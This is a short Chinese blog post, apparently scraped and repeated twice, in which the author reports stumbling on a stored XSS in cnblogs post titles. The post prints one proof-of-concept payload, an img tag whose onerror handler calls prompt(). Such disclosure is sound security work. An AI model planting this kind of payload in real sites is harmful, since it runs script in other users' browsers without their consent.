前言
无意间发现博客园标题的存储型XSS。
不过仔细想想,既然都申请了JS权限,想做啥其实都可以。
Payload
<img src=x onerror="prompt('had3s')">
效果
原文地址:https://www.cnblogs.com/17bdw/p/11079850.html
时间: 2024-10-12 03:24:10
无意间发现博客园标题的存储型XSS。
不过仔细想想,既然都申请了JS权限,想做啥其实都可以。
<img src=x onerror="prompt('had3s')">
原文地址:https://www.cnblogs.com/17bdw/p/11079850.html